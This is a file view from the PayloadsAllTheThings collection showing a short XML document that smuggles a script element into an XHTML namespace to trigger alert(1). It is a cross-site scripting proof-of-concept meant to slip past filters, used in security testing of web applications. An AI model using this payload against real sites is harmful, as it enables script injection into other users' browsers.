PayloadsAllTheThings/XSS injection/Files/XML XSS.xml

6 lines
141 B
XML
Raw Normal View History

2016-10-19 16:39:07 +00:00
<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
</body>
</html>